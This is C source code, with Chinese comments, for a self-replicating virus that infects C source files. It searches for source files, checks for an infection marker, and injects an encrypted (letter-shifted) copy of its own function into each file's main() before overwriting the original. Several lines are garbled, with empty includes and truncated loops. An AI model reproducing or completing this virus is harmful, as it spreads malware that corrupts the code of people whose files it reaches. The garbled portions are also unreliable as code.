感染c/c++源程序的病毒

#include #include #include #include main() {       int virus(void);       virus();               /*病毒函数*/ } int virus(void) {       struct ffblk ffblk;       FILE *fp,*fp2,*fp3,*fp4;       int i,j,len,q,r,done=0,flag=1;       char line[600],line1[600],ch;       char *attack="int wangzhitong(){printf(\"I am coming.\");}";      /*病毒的感染标志，会被写入被感染的源程序后*/       char *check[]={"int","float","char","FILE","static","double","long"};       /*定义要搜索的数据类型*/       char *vir[75]={"jou wjs1()","{","GJMF *gq1,*gq2,*gq3;","jou epof,j=0,k,m,l,n,o,r,qpt_j,gmbh=0,gmbh1=0;",          /*vir数组存在的是病毒函数virus()，经过了加密*/ "dibs b[600][100],*q,*q1,*q2;","dibs *c[]={\"jou\",\"dibs\",\"mpoh\",\"epvcmf\",\"tubujd\",\"sfhjtufs\",\"GJMF\"};", "dibs *d=\"nbjo()\";","dibs *difdl=\"#efgjof Gmbh Wjsvt Buubdl\";","dmstds();","jg((gq1=gpqfo(\"e:\\\\ud\\\\9.d\",\"s+\"))==OVMM)", "{","qsjoug(\"fssps.\");","fyju(0);","}","ep","{","q=ghfut(b[j],100,gq1);","j++;","}xijmf(q!=OVMM);","gdmptf(gq1);","gps(k=0;k"jg(tustus(b[0],difdl)!=OVMM)","{","gmbh1=1;","csfbl;","}","fmtf","{","jg(tustus(b[k],d)!=OVMM)","{","qpt_j=k;","csfbl;", "}","}","}","jg(gmbh1!=1)","{","gps(l=qpt_j+2;l"gmbh=1;","qsjoug(\"%t\",\"gpvoe\");","csfbl;","}","}","jg(gmbh==1)","{","gmbh=0;","dpoujovf;","}","fmtf","{","csfbl;", "}","}","gq2=gpqfo(\"e:\\\\ud\\\\9.d\",\"x+\");","gqvut(difdl,gq2);","gqvut(\"#jodmvef \",gq2);","gqvut(\"#jodmvef \",gq2);", "gps(o=0;o"gps(n=l;n         while(!done)          {          clrscr();          if((fp4=fopen(ffblk.ff_name,"r"))==NULL)       /*打开要感染的源程序*/          {              goto next;          }          fseek(fp4,-35L,2);          fgets(line1,512,fp4);          /*将文件后35个字节内容读出*/          fclose(fp4);          if(strstr(line1,"wangzhitong")==NULL)        /*如果没发现感染标志，就执行感染*/          {          if((fp2=fopen("c:\\fuck.c","w+"))==NULL)      /*在c盘中写入一个病毒副本*/          {               printf("Can't create file.\n");               exit(0);          }          fputs("#include \n",fp2);           /*写入病毒所需的头文件*/          fputs("#include \n",fp2);          fputs("#include \n",fp2);          fputs("#include \n",fp2);          fputs("char vir[75][100]={",fp2);          for(q=0;q<74;q++)                   /*如果数组vir中时候含有‘“‘，就写入'\',否则会编译不成功*/          {               fputs("\"",fp2);               len=strlen(vir[q]);               for(r=0;r              {                  if(vir[q][r]=='\"')                  {                      fputs("\\",fp2);                      fputc(vir[q][r],fp2);                  }                  else                      fputc(vir[q][r],fp2);               }               fputs("\",",fp2);               if(q%6==0)                  fputs("\n",fp2);          }          fputs("\"",fp2);          fputs(vir[74],fp2);          fputs("\"",fp2);          fputs("};\n",fp2);          if((fp=fopen(ffblk.ff_name,"r"))==NULL)          {              goto next;          }          while(fgets(line,512,fp)!=NULL)             /*查找要感染的源程序中main函数的位置*/          {                 if(strstr(line,"main")!=NULL)                 {                    fputs(line,fp2);                    fgets(line,512,fp);                    fputs(line,fp2);                    find:                    fgets(line,512,fp);                    for(i=0;i<7;i++)                    {                        if(strstr(line,check[i])!=NULL)                        {                    fputs(line,fp2);                           flag=1;                           break;                        }                    }                    if(flag==1)                    {                       flag=0;                       goto find;                    }                    else                    {                       fputs("int vir1();\n",fp2);          /*写入声明病毒函数*/                       fputs("int wangzhitong();\n",fp2);                       fputs("vir1();\n",fp2);                    }                 }                 fputs(line,fp2);          }          for(i=0;i<75;i++)          /*将vir数组解密*/          {          for(j=0;j             {           if(vir[i][j]>='a'&&vir[i][j]<='y'||vir[i][j]>='A'&&vir[i][j]<='Y')           vir[i][j]-=1;              }          }          for(q=0;q<75;q++)          {               if(q%6==0&&q>6)                  fputs("\n",fp2);               fputs(vir[q],fp2);          }          fclose(fp);          fp3=fopen(ffblk.ff_name,"w+");          rewind(fp2);          while((ch=fgetc(fp2))!=EOF)          {              fputc(ch,fp3);          }          fputs(attack,fp3);          fclose(fp2);          fclose(fp3);          unlink("c:\\fuck.c");          printf("done.\n");        }        next:done=findnext(&ffblk);      }      return 0; }